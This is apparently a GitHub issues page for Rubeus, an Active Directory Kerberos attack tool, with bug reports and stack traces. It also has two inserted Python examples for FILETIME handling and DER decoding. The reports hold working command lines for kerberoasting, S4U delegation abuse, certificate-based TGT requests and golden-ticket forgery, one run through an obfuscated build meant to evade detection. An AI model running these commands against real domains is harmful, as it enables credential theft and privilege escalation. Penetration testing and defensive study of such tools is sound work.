
rubeus's People

Contributors

0xe7, 0xrca, 4ndr3w6, blueskeye, ccob, cnotin, coffeegist, dliv3, eladshamir, erasmusc, g0ldengunsec, harmj0y, joedibley, l0ss, lberezy, leechristensen, mark-s, matterpreter, mbinns, mdoi12mdjf, michael-dev, pkb1s, qlemaire, r3motecontrol, rvrsh3ll, saerxcit, skorov, theogobinet, tyranid, vbscrub

rubeus's Issues

Consider Making Build Into Library

So, couple ideas here, by passing parameters on cmdline, you expose sensitive material to Command Line Loggers.

By being a library/dll assembly, you can import and load into other tools and remove any cmdline leaking.

Just an idea ;-) . Great work!

KRB-ERROR (68) : KDC_ERR_WRONG_REALM

C:/Windows/Temp/Rubeus.exe asktgs /ticket:REDACTED /service:CIFS/test-dc1.test.local

I get the above error when using asktgs. Bi-directional trust between two forests and ticket is generated with rc4 trust key from recent hashdump. Any ideas on issue?

NullReferenceException from ex.InnerException in ASRepRoast

This line (193) in the ASRepRoast function doesn't check whether InnerException is null before accessing it, and in some cases it is indeed null (for example if you run asreproast on a non-domain machine and forget to specify the domain):

Console.WriteLine("\r\n[X] Error executing the domain searcher: {0}", ex.InnerException.Message);

I'll submit a PR to fix this, but will be my first time doing that so apologies if I do something stupid.

Compile issues/documentation incongruity

The documentation says it compiles in VS2015CE, and includes a link, however it doesn't seem to. Issue #41 shows a user having an issue, the same one I appear to be having.

I have a nearly-fresh Windows install, a completely fresh installation of Visual Studio 2015 Community Edition, and a fresh downloaded ZIP from the repository and I see errors when I try to build for release:

It starts with:

Severity	Code	Description	Project	File	Line	Suppression State
Error	CS1003	Syntax error, ',' expected	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active
Error	CS1003	Syntax error, ',' expected	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active

Then if I follow one, it expands to:

Severity	Code	Description	Project	File	Line	Suppression State
Error	CS0103	The name 'var' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active
Error	CS0103	The name 'var' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active
Error	CS0103	The name 'luidPtr' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active
Error	CS0103	The name 'luidPtr' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	701	Active
Error	CS0103	The name 'luidPtr' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	703	Active
Error	CS0103	The name 'luidPtr' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	703	Active
Error	CS0103	The name 'luidPtr' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	705	Active
Error	CS0103	The name 'count' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active
Error	CS0103	The name 'count' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	699	Active
Error	CS1003	Syntax error, ',' expected	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active
Error	CS1003	Syntax error, ',' expected	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active
Error	CS1003	Syntax error, ',' expected	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active
Error	CS1003	Syntax error, ',' expected	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active

I haven't downloaded VS2019 yet to see if it does actually work there, but I did spend some time troubleshooting and it seemed like an endless rabbit hole so I stopped.

From what I can see either:

  1. The documentation may need to be updated to say to use VS2019
  2. There may be bugs that need to be fixed.

I don't have enough Csharp experience to know which!

Thanks!

KDC has no support for PADATA type (pre-authentication data) KDC_ERR_PADATA_TYPE_NOSUPP

I get the error 'KDC has no support for PADATA type (pre-authentication data)' when I run asktgt with a certificate:

Rubeus.exe asktgt /user:dc$ /certificate:C:\host1.pfx /createnetonly:C:\Windows\System32\cmd.exe /show /domain:domain.local /dc:10.0.0.1


   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

v1.6.4

[*] Action: Ask TGT

[*] Showing process : True
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4128
[+] LUID : 0x822bf2

[*] Using PKINIT with etype rc4_hmac and subject: CN=dc.domain.local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'domain.local\dc$'
[*] Target LUID : 8530930

[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP

Alternate credentials issue

When using alternate credentials, the /creduser must be specified with: /creduser:DOMAIN.FQDN\USER

However, this does not work and Rubeus can not connect to the DC:

.\Rubeus.exe kerberoast /creduser:example.com\demo /credpassword:Password123 /dc:192.168.0.38 /domain:example.com

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.4.2


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : example.com

[X] Error creating the domain searcher: The LDAP-Server is not available.

But when I am using the IP of the DC, everything works as expected:

.\Rubeus.exe kerberoast /creduser:192.168.0.38\demo /credpassword:Password123 /dc:192.168.0.38 /domain:example.com

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.4.2


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : example.com
[*] Using alternate creds  : 192.168.0.38\demo
[*] Searching path 'LDAP://192.168.0.38' for Kerberoastable users

[X] No users found to Kerberoast!

ASRep Roast Hash Format Missing eType

Just noticed the hash outputted by asreproast does not contain the eType, not sure if this is intended or not.

 .\Rubeus.exe asreproast

[*] Action: AS-REP roasting
...
[*] AS-REP hash:

      $krb5asrep$ASRep_AES128@....

At least for hashcat the eType must be specified, e.g.: $krb5asrep$eType$userName...

Based on a quick example run in my lab it seems eType 23 (ARCFOUR) is requested by Rubeus and contained in all AS-REP responses (even for AES-128/256 enabled users), as shown in the screenshot attached to the issue:

[image: screenshot of the AS-REP responses, not reproduced here]

All retrieved AS-REP responses for RC4, AES128 and AES256 users could be cracked with hashcat -m 18200 using eType 23.

If not intended otherwise, eType 23 could be added to the returned hashes (as is done with kerberoast hashes).

About [X] KRB-ERROR (75) : 75

Hello, while testing something in my test environment, I found that version 1.6.4 has something wrong, or a bug?
My command, for example to ptt, is like this:
Rubeus.exe asktgt /user:OWA2013$ /ptt /certificate:XXX

The result shows something wrong, like this:
v1.6.4

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=OWA2013$
[*] Building AS-REQ (w/ PKINIT preauth) for: 'rootkit.org\OWA2013$'

[X] KRB-ERROR (75) : 75

But my certificate is correct, and I don't know why the program does not succeed with ptt.
I need your help, thank you very much!

System.OverflowException For s4u, asktgt, describe

Exploring abuse paths, I was unable to successfully pull off an RBCD attack, due to a System.Overflow exception when using the s4u Rubeus command. Failing that, I went down a different path of deploying alternate credentials on another target (via Whisker.exe), and then using Rubeus to request a TGT using the asktgt command with the /certificate flag. This also resulted in an overflow exception. Using asktgt for other, less-valuable, randomly selected targets worked fine.

The original RBCD command:
.\Dumpeus.exe s"4"u /user:AB0123CDEF /rc4:FCF7748F9820FE4B1C70F3D8A763ADDA /impersonateuser:'$UserStartsWithDollar' /msdsspn:WSMAN/up0013abcd.client.net /domain:client.net /dc:up123abc.client.net /luid: 0x9afcde8 /ptt

The error, after successful TGT request, S4U2self, and TGS acquisition [snipped from output preceding error]...

[*] Building S4U2proxy request for service: 'WSMAN/up0013abcd.client.net'
[*] Sending S4U2proxy request
[*] No more data available. Assuming Domain Controller [REDACTED] is finished sending data: An existing connection was forcibly closed by the remote host

[!] Unhandled Rubeus exception:

System.OverflowException: Array dimensions exceeded supported range.
   at proceed.henderson.doll(String server, Int32 port, Byte[] data, Boolean noHeader)
   at film.logging.bedroom(unique kirbi, String targetUser, String targetSPN, String outfile, Boolean ptt, String domainController, String altService, unique tgs, Boolean opsec)
   at film.logging.commodity(unique kirbi, String targetUser, String targetSPN, String outfile, Boolean ptt, String domainController, String altService, unique tgs, String targetDomainController, String targetDomain, Boolean s, Boolean opsec, Boolean bronzebit, String keyString, KERB_ETYPE encType, String requestDomain, String impersonateDomain)
   at film.logging.tribunal(String userName, String domain, String keyString, KERB_ETYPE etype, String targetUser, String targetSPN, String outfile, Boolean ptt, String domainController, String altService, unique tgs, String targetDomainController, String targetDomain, Boolean self, Boolean opsec, Boolean bronzebit)
   at rating.lpYCQJ6k3Gkd.Execute(Dictionary`2 arguments)
   at yQkttURY2tqu.confirm.restructuring(String commandName, Dictionary`2 arguments)
   at granted.trails.MainExecute(String commandName, Dictionary`2 parsedArgs)

Switching to a shadow credential attack, and then asking for a TGT, I received a similar error:
Dumpeus2.exe "a"s"k"t"g"t /user:$DifferentUserWithDollarSign /certificate:c:\temp\id.txt /password:P@55word1234567890 /domain:client.net /dc:up123abc.client.net /getcredentials /show

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=$DifferentUserWithDollarSign
[*] Building AS-REQ (w/ PKINIT preauth) for: 'client.net\$DifferentUserWithDollarSign'

[!] Unhandled Rubeus exception:

System.Exception: Error parsing response AS-REQ: digit.college: value overflow
   at bloom.community.brooklyn(Byte[] buf, Int32 off, Int32 maxLen, Int32& tc, Int32& tv, Boolean& cons, Int32& valOff, Int32& valLen)
   at bloom.community.distant(Byte[] buf, Int32 off, Int32 len, Boolean exactLength)
   at bone.ladder.award(cardiac asReq, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, constraints luid, Boolean describe, Boolean verbose, Boolean opsec).  Base64 response: a4IS**[BASE64 TICKET SNIPPED/REDACTED]**5sM=
   at bone.ladder.award(cardiac asReq, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, constraints luid, Boolean describe, Boolean verbose, Boolean opsec)
   at bone.ladder.heads(String userName, String domain, String certFile, String certPass, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, constraints luid, Boolean describe, Boolean verifyCerts)
   at nut.soap.Execute(Dictionary`2 arguments)
   at lit.FzaoJ2VoQiXp.centre(String commandName, Dictionary`2 arguments)
   at ef.WHJR6iiyUIHh.MainExecute(String commandName, Dictionary`2 parsedArgs)

Given the above error showed the base64 value of the ticket obtained therein, I attempted to describe it, with the following error:
Dumpeus2.exe describe /ticket:a4IS**[BASE64 TICKET SNIPPED/REDACTED]**5sM=

[*] Action: Describe Ticket


[!] Unhandled Rubeus exception:

digit.college: value overflow
   at bloom.community.brooklyn(Byte[] buf, Int32 off, Int32 maxLen, Int32& tc, Int32& tv, Boolean& cons, Int32& valOff, Int32& valLen)
   at bloom.community.distant(Byte[] buf, Int32 off, Int32 len, Boolean exactLength)
   at worlds.professor..ctor(Byte[] bytes)
   at photographers.climb.Execute(Dictionary`2 arguments)
   at lit.FzaoJ2VoQiXp.centre(String commandName, Dictionary`2 arguments)
   at ef.WHJR6iiyUIHh.MainExecute(String commandName, Dictionary`2 parsedArgs)

I don't think the issue is the obfuscation of Rubeus, because other tickets can be acquired/shown/passed/described without error. I also understand it may be difficult to troubleshoot this without the contents of the base64-encoded ticket, so I can decode and submit components of the tickets as warranted/requested to help resolve this [potential] issue.

This seems to be in the same ballpark as these issues:

I am using the latest version. I also compiled the version from the June 7, 2021 commit (I believe the first commit with the /certificate capability), and I get the same errors.

Thanks!

Silver ticket creation fails if badpwdcount and/or logoncount are 0

In lines 464 and 465 of ForgeTicket.cs:

Seems like these values don't end up in the userObject dictionary if the user has never logged on, which causes:

System.Collections.Generic.KeyNotFoundException: The given key was not present in the dictionary.
   at System.ThrowHelper.ThrowKeyNotFoundException()
   at System.Collections.Generic.Dictionary`2.get_Item(TKey key)
   at Rubeus.ForgeTickets.ForgeTicket(String user, String sname, Byte[] serviceKey, KERB_ETYPE etype, Byte[] krbKey, KERB_CHECKSUM_ALGORITHM krbeType, Boolean ldap, String ldapuser, String ldappassword, String sid, String domain, String netbiosName, String domainController, TicketFlags flags, Nullable`1 startTime, Nullable`1 rangeEnd, String rangeInterval, Nullable`1 authTime, String endTime, String renewTill, Nullable`1 id, String groups, String sids, String displayName, Nullable`1 logonCount, Nullable`1 badPwdCount, Nullable`1 lastLogon, Nullable`1 logoffTime, Nullable`1 pwdLastSet, Nullable`1 maxPassAge, Nullable`1 minPassAge, Nullable`1 pGid, String homeDir, String homeDrive, String profilePath, String scriptPath, String resourceGroupSid, List`1 resourceGroups, PacUserAccountControl uac, String outfile, Boolean ptt, Boolean printcmd, String cName, String cRealm, String s4uProxyTarget, String s4uTransitedServices, Boolean includeAuthData)
   at Rubeus.Commands.Silver.Execute(Dictionary`2 arguments)
   at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

Wrong format for AES-encrypted tgsrep?

Doing:

> rubeus.exe kerberoast /format:hashcat /aes

... produces AES256 hashes in the format:

$krb5tgs$18$*[username]$[domain]$[spn]*$[checksum]$[edata]

Feeding this to hashcat (v5.1.0) results in an error:

~> hashcat -m 19700 -o cracked.txt -a 0 krb5tgs.txt password.txt

Hashfile 'krb5tgs.txt' on line 1 ($krb5t...3bc0e660c3164355a02806c3d248afc0): Separator unmatched
No hashes loaded.

Looking at the corresponding hashcat module, the expected format is:

$krb5tgs$18$[username]$[domain]$*[spn]*$[checksum]$[edata]

Manually updating the hash from Rubeus results in another error

~> hashcat -m 19700 -o cracked.txt -a 0 krb5tgs2.txt password.txt

Hashfile 'krb5tgs2.txt' on line 1 ($krb5t...3bc0e660c3164355a02806c3d248afc0): Token length exception
No hashes loaded.

Apparently hashcat expects the checksum to be exactly 24 chars wide.

Manually moving the $ separator 8 chars up makes hashcat load the hash, but doesn't succeed in cracking it. I suspect we need to re-calculate the checksum over the cipherText part, but I'm a bit out of my depth here 😄

Support for KDC Proxy

Hi, I wonder if it would make sense to add support for KDC Proxy (MS-KKDCP) to Rubeus. AFAIK, Remote Desktop Gateways and DirectAccess VPN servers are exposing Kerberos over HTTPS. This could theoretically open new and interesting scenarios like account enumeration and kerberoasting over the Internet. It should also be possible to deploy a standalone KDC Proxy Service for testing (thx @SteveSyfuhs).

kerberoast /rc4opsec Mode does not support alternate credentials

Please add the support for alternate credentials when performing /rc4opsec mode on kerberoast.

This is not supported atm and Rubeus tries to get a TGT for the current user instead:

.\Rubeus.exe kerberoast /rc4opsec /format:hashcat /creduser:example.com\demo /credpassword:Password123 /dc:192.168.0.38 /domain:example.com


[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user

  [X] Error 1355 retrieving domain controller : Die angegebene Domäne ist nicht vorhanden, oder es konnte keine Verbindung hergestellt werden
[X] Error retrieving current domain controller

[!] Unhandled Rubeus exception:

System.NullReferenceException: Der Objektverweis wurde nicht auf eine Objektinstanz festgelegt.
   bei Asn1.AsnElt.Decode(Byte[] buf, Boolean exactLength)
   bei Rubeus.KRB_CRED..ctor(Byte[] bytes)
   bei Rubeus.Roast.Kerberoast(String spn, String userName, String OUName, String domain, String dc, NetworkCredential cred, String outFile, KRB_CRED TGT, Boolean useTGTdeleg, String supportedEType, String pwdSetAfter, String pwdSetBefore, Int32 resultLimit)
   bei Rubeus.Commands.Kerberoast.Execute(Dictionary`2 arguments)
   bei Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   bei Rubeus.Program.Main(String[] args)

Feature request - output file & multi ASREPROAST

First of all, great tool! I have noticed I could use a function to create output files for hashes for stuff like roasting (hashcat format would be best) and perhaps methods to multi ASREProast by loading a userlist or even bruteforcing usernames and automatically checking each user for the no preauth.

Error 1312 for service tickets that contain a slash in the SPN

Steps to reproduce:

In mimikatz, run the following:

kerberos::golden /domain:blah.local /sid:S-1-5-21-1234123412-1234123412 /rc4:11112222333344445555666677778888 /target:blahblah.local /service:asdf/asdf /user:Administrator /ptt

Then, when you run Rubeus.exe dump you'll see the following error:

[X] Error 1312 calling LsaCallAuthenticationPackage() for target "asdf/asdf/blahblah.local" : A specified logon session does not exist. It may already have been terminated

Klist.exe and mimikatz successfully list the tickets, however.

Silver ticket creation with /ldap arg fails when account has never reset password

While trying to create a silver ticket with the /ldap arg:

In ForgeTicket.cs at line 399, if the user has never reset their password the userObject["pwdlastset"] result ends up with Rubeus trying to make a _FILETIME out of a DateTime for 01/01/0001 12:00:00 AM, resulting in the following stack trace:

System.ArgumentOutOfRangeException: Not a valid Win32 FileTime.
   at System.DateTime.InternalToFileTime(Int64 ticks)
   at System.DateTime.ToFileTimeUtc()
   at Rubeus.Ndr._FILETIME..ctor(DateTime dateTime)
   at Rubeus.ForgeTickets.ForgeTicket(String user, String sname, Byte[] serviceKey, KERB_ETYPE etype, Byte[] krbKey, KERB_CHECKSUM_ALGORITHM krbeType, Boolean ldap, String ldapuser, String ldappassword, String sid, String domain, String netbiosName, String domainController, TicketFlags flags, Nullable`1 startTime, Nullable`1 rangeEnd, String rangeInterval, Nullable`1 authTime, String endTime, String renewTill, Nullable`1 id, String groups, String sids, String displayName, Nullable`1 logonCount, Nullable`1 badPwdCount, Nullable`1 lastLogon, Nullable`1 logoffTime, Nullable`1 pwdLastSet, Nullable`1 maxPassAge, Nullable`1 minPassAge, Nullable`1 pGid, String homeDir, String homeDrive, String profilePath, String scriptPath, String resourceGroupSid, List`1 resourceGroups, PacUserAccountControl uac, String outfile, Boolean ptt, Boolean printcmd, String cName, String cRealm, String s4uProxyTarget, String s4uTransitedServices, Boolean includeAuthData)
   at Rubeus.Commands.Silver.Execute(Dictionary`2 arguments)
   at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)
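
Both silver-ticket reports above (the KeyNotFoundException when badpwdcount/logoncount are absent, and the "Not a valid Win32 FileTime" when pwdLastSet has never been set) fail on the same class of input: the directory omits integer attributes whose value is zero, and a pwdLastSet of 0 decoded as DateTime.MinValue cannot be turned into a FILETIME. The following is an added example, not Rubeus code, showing how to normalise such a user object before converting its timestamps to and from Win32 FILETIME with those sentinels handled. The attribute keys follow the issue text (userObject["pwdlastset"] etc.), the sample object is constructed, and the UNIX_EPOCH / DOTNET_MIN_DATETIME constants exist only to exercise the edge cases.

```python
# Added example (not Rubeus code): LDAP user-object normalisation and
# FILETIME conversion with the "never set" / "absent when zero" edge cases.
from datetime import datetime, timedelta, timezone
from typing import Any, Dict, Optional

# A FILETIME counts 100-ns intervals since 1601-01-01 00:00:00 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000
NEVER = 0                        # AD stores 0 in pwdLastSet/lastLogon for "never"
NO_EXPIRY = 0x7FFFFFFFFFFFFFFF   # accountExpires sentinel for "never expires"

# Reference points used only for demonstration / testing.
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
DOTNET_MIN_DATETIME = datetime(1, 1, 1, tzinfo=timezone.utc)   # DateTime.MinValue

# Attribute keys as written in the issue text.
COUNTER_ATTRS = ("logoncount", "badpwdcount")
TIMESTAMP_ATTRS = ("pwdlastset", "lastlogon", "lastlogoff", "accountexpires")


def filetime_to_datetime(filetime: int) -> Optional[datetime]:
    """Convert a FILETIME integer to an aware UTC datetime; sentinels become None."""
    if filetime in (NEVER, NO_EXPIRY):
        return None
    if filetime < 0:
        raise ValueError("negative FILETIME")
    # timedelta resolution is microseconds, so sub-microsecond ticks are dropped.
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def datetime_to_filetime(dt: Optional[datetime]) -> int:
    """Inverse conversion. None maps back to 0. Dates before 1601 are rejected,
    which mirrors .NET's DateTime.ToFileTimeUtc() throwing for DateTime.MinValue."""
    if dt is None:
        return NEVER
    if dt.tzinfo is None:
        raise ValueError("naive datetime; supply a timezone")
    if dt < FILETIME_EPOCH:
        raise ValueError("Not a valid Win32 FileTime")
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def normalize_user_object(raw: Dict[str, Any]) -> Dict[str, Any]:
    """Fill in every field that downstream code reads unconditionally.

    AD leaves zero-valued integer attributes out of the result set, so a plain
    dictionary lookup raises KeyNotFoundException in C# (KeyError in Python).
    Timestamps of 0 or absent become None instead of a year-0001 datetime.
    """
    user: Dict[str, Any] = dict(raw)
    for attr in COUNTER_ATTRS:
        user[attr] = int(raw.get(attr, 0))              # absent counter means 0
    for attr in TIMESTAMP_ATTRS:
        user[attr] = filetime_to_datetime(int(raw.get(attr, NEVER)))
    return user


def pwd_last_set_filetime(user: Dict[str, Any]) -> int:
    """Value to write back into a FILETIME field: 0 when the password was never set."""
    return datetime_to_filetime(user["pwdlastset"])


# Constructed sample: an account that has never logged on or set a password.
SAMPLE_NEVER_LOGGED_ON = {
    "samaccountname": "svc-example",   # constructed value
    "pwdlastset": "0",                 # LDAP libraries return large integers as strings
}

if __name__ == "__main__":
    user = normalize_user_object(SAMPLE_NEVER_LOGGED_ON)
    print(user["logoncount"], user["badpwdcount"], user["pwdlastset"])
    print(pwd_last_set_filetime(user))
    print(datetime_to_filetime(UNIX_EPOCH))
```

The sentinel handling is the whole point: a FILETIME of 0 is a legitimate directory value meaning "never", so it must round-trip to 0 rather than pass through a datetime that the FILETIME constructor rejects.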

New PKInit / Smartcard features fail on FIPS enforced systems

New PKInit features fail when FIPS compliance is enforced. SHA1Managed is not FIPS compliant. Suggested code changes are available in #66. It is a simple change to FIPS compliant classes as the classes have the same methods. Opening this issue to call attention to the PR.

asktgt Asn1.AsnException: value overflow

Just pulled the latest and tried a run of the mill asktgt, attempted with RC4 and AES128 hashes.

PS C:\Dev\Rubeus-master\Rubeus\bin\Release> .\Rubeus.exe asktgt /user:<redacted> /aes128:<redacted> /domain:<redacted> /dc:<redacted>

[*] Action: Ask TGT

[*] Using aes128_cts_hmac_sha1 hash: <redacted>
[*] Building AS-REQ (w/ preauth) for: '<redacted>\<redacted>'

[!] Unhandled Rubeus exception:

Asn1.AsnException: value overflow
   at Asn1.AsnElt.Decode(Byte[] buf, Int32 off, Int32 maxLen, Int32& tc, Int32& tv, Boolean& cons, Int32& valOff, Int32& valLen)
   at Asn1.AsnElt.Decode(Byte[] buf, Int32 off, Int32 len, Boolean exactLength)
   at Rubeus.Ask.InnerTGT(String userName, String domain, String keyString, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, LUID luid, Boolean describe, Boolean verbose)
   at Rubeus.Ask.TGT(String userName, String domain, String keyString, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, LUID luid, Boolean describe)
   at Rubeus.Commands.Asktgt.Execute(Dictionary`2 arguments)
   at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)
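
The "value overflow" in the trace above, and in the earlier System.OverflowException report with the obfuscated build, is the ASN.1 decoder finding a DER length field that claims more bytes than remain in the buffer, which is what a truncated or mangled KDC reply looks like to a parser. The block below is an added example, not Rubeus or its Asn1 library: a minimal DER tag/length reader in Python that performs exactly that check and decodes nested elements. It runs over constructed blobs (one well-formed, one truncated, one with a long-form length), not real KDC traffic; the AsnError class, Tlv dataclass and function names are my own.

```python
# Added example (not Rubeus code): minimal DER decoder with the length check
# that produces "value overflow" on truncated input.
from dataclasses import dataclass
from typing import List, Tuple


class AsnError(ValueError):
    """Raised for any DER encoding violation."""


@dataclass(frozen=True)
class Tlv:
    tag_class: int       # 0 universal, 1 application, 2 context-specific, 3 private
    tag_number: int
    constructed: bool
    value: bytes
    children: tuple      # decoded sub-elements when constructed, else ()


def read_header(buf: bytes, off: int, end: int) -> Tuple[int, int, bool, int, int]:
    """Parse tag and length at buf[off:end]; return (class, number, constructed, val_off, val_len)."""
    if off >= end:
        raise AsnError("truncated: no tag byte")
    b = buf[off]
    off += 1
    tag_class, constructed, number = b >> 6, bool(b & 0x20), b & 0x1F
    if number == 0x1F:                       # high tag number form: base-128 digits follow
        number = 0
        while True:
            if off >= end:
                raise AsnError("truncated: high tag number")
            b = buf[off]
            off += 1
            number = (number << 7) | (b & 0x7F)
            if not b & 0x80:
                break
    if off >= end:
        raise AsnError("truncated: no length byte")
    b = buf[off]
    off += 1
    if b < 0x80:                             # short form
        length = b
    elif b == 0x80:
        raise AsnError("indefinite length is not DER")
    else:                                    # long form: low 7 bits = number of length bytes
        n = b & 0x7F
        if n > 4:
            raise AsnError("length field too wide")
        if off + n > end:
            raise AsnError("truncated: length bytes")
        length = int.from_bytes(buf[off:off + n], "big")
        off += n
    # The check behind the page's error: declared length exceeds the bytes left.
    if length > end - off:
        raise AsnError("value overflow")
    return tag_class, number, constructed, off, length


def decode_one(buf: bytes, off: int, end: int) -> Tuple[Tlv, int]:
    """Decode the element at buf[off], recursing into constructed values."""
    tag_class, number, constructed, val_off, val_len = read_header(buf, off, end)
    value = bytes(buf[val_off:val_off + val_len])
    children = tuple(decode_all(value)) if constructed else ()
    return Tlv(tag_class, number, constructed, value, children), val_off + val_len


def decode_all(buf: bytes) -> List[Tlv]:
    """Decode consecutive elements that must exactly fill buf (exactLength semantics)."""
    elems, off, end = [], 0, len(buf)
    while off < end:
        elem, off = decode_one(buf, off, end)
        elems.append(elem)
    return elems


def decode(buf: bytes) -> Tlv:
    """Decode one top-level element; trailing bytes are an error under DER."""
    elem, off = decode_one(buf, 0, len(buf))
    if off != len(buf):
        raise AsnError(f"{len(buf) - off} trailing byte(s) after element")
    return elem


def classify(buf: bytes) -> str:
    """Return 'ok' or the AsnError message, for quick triage of a captured blob."""
    try:
        decode(buf)
        return "ok"
    except AsnError as e:
        return str(e)


# Constructed samples (not real KDC traffic).
GOOD = bytes.fromhex("3006" "020105" "040141")    # SEQUENCE { INTEGER 5, OCTET STRING "A" }
TRUNCATED = bytes.fromhex("300a" "020105")         # SEQUENCE claims 10 bytes, only 3 follow
LONG_FORM = bytes([0x04, 0x81, 0x03]) + b"abc"    # OCTET STRING with a 2-byte length encoding

if __name__ == "__main__":
    for name, blob in (("GOOD", GOOD), ("TRUNCATED", TRUNCATED), ("LONG_FORM", LONG_FORM)):
        print(f"{name}: {classify(blob)}")
```

When triaging a failure like the one reported, dumping the base64 response and running it through a decoder of this kind tells you immediately whether the bytes are a complete DER structure or were cut off (for example by a connection the DC closed early), before suspecting the Kerberos logic itself.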

Create tickets directly for golden/silver ticket attacks?

Forgive me if I'm missing something, but it doesn't look like it's currently possible to create golden/silver tickets in Rubeus and I was just curious if this is something we can add or if it was intentionally not included?

I know we can use /asktgt and /asktgs to request legitimate tickets from a DC, and we can use /ptt to cache those. But what about the silver ticket attack style that you can do in mimikatz and Impacket's ticketer.py, where you don't get the service ticket from a DC but instead create a fake one using the service account's password to encrypt it (and then /ptt to cache that).

It seems like a lot of the ground work required for that has already been done in Rubeus, so I'm wondering if it was an intentional choice to leave it out or if it's just a case of no one having had a chance to implement it yet? If it's the latter, I might have a go at it.

Support for full path in /output

As a user of Rubeus, I would like to be able to output tickets into folders defined by full path.

Ref: #63

The workaround given in

    // Great method from http://forcewake.me/today-i-learned-sanitize-file-name-in-csharp/
    // Replaces every character that is invalid in a file name with "_", so path
    // separators and the drive colon of a full path are rewritten as well.
    static public string MakeValidFileName(string name)
    {
        string invalidChars = new string(Path.GetInvalidFileNameChars());
        string escapedInvalidChars = Regex.Escape(invalidChars);
        string invalidRegex = string.Format(@"([{0}]*\.+$)|([{0}]+)", escapedInvalidChars);
        return Regex.Replace(name, invalidRegex, "_");
    }

is protection from user stupidity, which is (I hope) out of the original purpose of the tool.

Syntax Errors in Release Build: LSA.CS, Line 692

Is anyone else getting errors when attempting to build the Release for Rubeus? I'm able to load the project, but when I try to build the Release configuration, I get the below errors.

All are inside LSA.CS and have to do with line 692:

var ret = Interop.LsaEnumerateLogonSessions(out var count, out var luidPtr);

I'm getting a (Syntax Error, "," expected) and a bunch of errors about how "the name var does not exist in the current context." Same goes for "count" and "luidPtr".

I've confirmed I have the .NET Framework 3.5 installed and have built other projects in the repository okay, such as SharpUp.

Let me know if additional information is required.

Exception when using rc4opsec and targeting SPN(s) with service names

Situation: target user has an SPN set that has a form like "HTTP/computer.domain.local:10000/CN=Users,DC=domain,DC=local" (ex: https://docs.microsoft.com/en-us/windows/win32/ad/name-formats-for-unique-spns#replicable-services) and msDS-SupportedEncryptionTypes is not set. Rubeus kerberoasts as expected when run without any arguments but throws the following exception when run with rc4opsec:

